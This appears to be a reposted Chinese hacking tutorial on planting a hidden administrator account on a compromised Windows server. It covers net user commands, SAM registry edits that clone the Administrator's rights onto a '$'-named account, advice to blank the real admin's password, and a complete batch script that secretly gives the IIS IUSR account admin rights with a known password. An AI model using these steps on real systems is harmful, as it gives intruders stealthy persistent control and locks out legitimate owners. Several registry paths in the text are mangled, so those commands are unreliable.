Windows下建立隐藏管理员账号

出处也找不到了，随便一搜网上一堆。

当我们成功的入侵的一台服务器后，我们不能更改原有管理员账号的密码，但是又想给自己留一条后路，怎么办呢，无疑，创建一个隐藏的管理员账号是最好的方法。
建立超级隐藏用户的方法：
我们先来看看要用到的几个DOS命令 （高手pass）
1.net命令
net user user1 123 /add
这个命令表示创建了一个user1的普通用户，密码是123
net user user1 /del 
这个命名表示把它删除
net localgroup administrators user1 /add
这个命令表示把user1加入管理员组
好了，net的用法还有很多,net user 可以查看到现有的用户
net user 后面加用户名就可以查看该用户的状态
比如net user user1就可以查看user1的属性
net user user1 /active:yes/no
yes是指激活当前用户，no是指禁用当前用户
好了，就介绍这么多，其他自己去研究吧。现在我们进入正题
首先，在运行下输入cmd进入命令行
接着输入net user abc$ /add
abc是建立的用户名，$符号是表示在dos下面隐藏
那么就完了吗？输入net user,察看的目录下并没有显示出abc$
但是你在运行里面输入lusrmgr.msc在用户里面看看（其实就是计算机管理里面的本地用和组），abc$还是存在的，这样的话就达不到超级隐藏的目的了。
下面我们接着看，如何把它在计算机管理里面隐藏起来。
于是我们要用到注册表了，在运行里面输入regedt32进入编辑界面
在下面键值下HKEY_LOCAL_MACHINE\SAM\sam做。默认此处只有system才有权限访问，administrator是没有的。首先我们要编辑它的权限，点sam 然后点窗口上的编辑，在点权限命令，赋予administrator对sam的完全控制权限。如果没有的话，点添加，输入administrator,点确定。好，然后刷新一下。重新打开，这样sam下面就可以展开了。到以下键值
HKEY_LOCAL_MACHINE\SAM\sam\domains\account\users,展开users,在展开users键值下的names.好了，现在你看到的就是你计算机上面所有的用户。
你 同样可以看到刚才建立的abc$这个用户。那么users下的键值怎么和names下的键值对应起来呢。你可以点一下administrator这个用 户，看看右边的窗口，你可以发现类型中它的值是0x1f4，好了，对应关键就在这里了。你可以同样点一下guest帐户。看看它的类型，0x1f5。好 了，大概知道了吧。用户名右边的类型和users键值下的项值是对应的。所以找到abc$的类型，并在users上找到它对应的项值。
下面我 们要做的是，把abc$和administrator做一个克隆，就是我们所说的超级隐藏帐户。点中administrator对应的users中的项 值,就是000001f4，可以看到右边窗口显示出来的F和V这两个二进制值。双击F，展开，然后把里面的内容复制。在切到abc$对应的users下对 应的项值中，同样双击F值，粘贴。好了，下面要做的指是导出键值，把names下面的abc$键值和users下对应的项值分别导出到桌面。点names 下的abc$然后再窗口中点文件选项，然后导出。可以导出到桌面，就命名为1好了。同样的，把users下对应的项值导出。ok,搞定。关闭注册表。 （也可以直接把000001F4导出注册表文件，然后修改注册表文件中第二行的1F4为我们所添加的abc$所对应的数值）

对于这些命令，我们可以在命令行下完成，导出：regedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers

/e 是regedit.exe的参数，在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的一定要以结尾。必要的情况 下可以用引号将“c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”引起来。
修改后导入：regedit.exe /s hacker1.reg

运行下输入cmd,输入net user abc$ /del命令成功完成。好了，分别双击刚才导出的键值。显示信息已经成功导入。ok,具有管理员权限的超级隐藏帐户就建立好了。
在cmd下输入net user，在运行里面输入lusrmgr.msc，abc$这个用户就没有了。但是它依然存在，就是不显示而已。
开 始，注销， ctrl+alt+del多按几下，显示出一个窗口，在用户名中输入abc$密码是空。回车，是不是进去了。怎么样，爽吧。那它是不是有超级管理权限呢？ 你自己试试不就知道了。看看可不可以改administrator的密码。运行中输入lusrmgr.msc，点用户选administrator，看看 右键，修改密码，省的麻烦，把它清空吧。密码已经设置。成功。这样一个隐藏得超级用户就建立了。
说了这么多，不知道你懂了没有，按着慢慢坐吧。但是仍然要告诉你一个事情，就是机器重启的话，abc$这个用户还是会在计算机管理下面显示出来。素以说我觉得真正可以建立隐藏用户的方法是没有的。至少现在我还没有发现。不过好像用软件可以实现。哎，慢慢来吧

建议：如果对方是有启动IIS的话，最好是克隆IUSER_XXXX的账号，以为估计一般管理员也不会整天去查看这个账号是否是在administrators组，即使重启户也不怕。然后可以长久的保存这个“隐藏”账号了。

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

本批处理根据服务器的情况，结合自己的研究，使用服务器本地iis帐号IUSR_计算机名，

设置密码位12345678（可以自己改一下批处理最后一行）。

这个来复制administrator权限，难以发现与引起怀疑。

（当然其他帐号也可以，用这个帐号主要通过机器名就能知道自己想要的入侵帐号密码是多少）

程序代码 程序代码
echo off
setlocal enabledelayedexpansion
echo %computername%
echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >”%windir%\..\1.reg”
regini “%windir%\..\1.reg”
regedit /e “%windir%\..\1.reg” HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%
rem unicode ->ascii
type “%windir%\..\1.reg” >”%windir%\..\2.reg”
del /q “%windir%\..\1.reg”
rem find IUSR_%computername% 的对应id
for /F “delims=( tokens=1-5* skip=3″ %%a in (%windir%\..\2.reg) do set iusr_id=%%b
del /q “%windir%\..\2.reg”
rem export administrator register
regedit /e “%windir%\..\1.reg” HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users00001F4
type “%windir%\..\1.reg” >”%windir%\..\2.reg”
del /q “%windir%\..\1.reg”
rem replace 1fx->iusr_id
for /f “tokens=* delims=:” %%i in (%windir%\..\2.reg) do (
for /f “tokens=*” %%j in (“%%i”) do (
set TMP=%%j
set “TMP=!TMP:000001F4=00000%iusr_id:~0,3%!”
echo !TMP!>>%windir%\..\1.reg
)
)
regedit /s %windir%\..\1.reg
del /q %windir%\..\1.reg
del /q %windir%\..\2.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >”%windir%\..\1.reg”
regini “%windir%\..\1.reg”
del /q “%windir%\..\1.reg”
net user IUSR_%computername% 12345678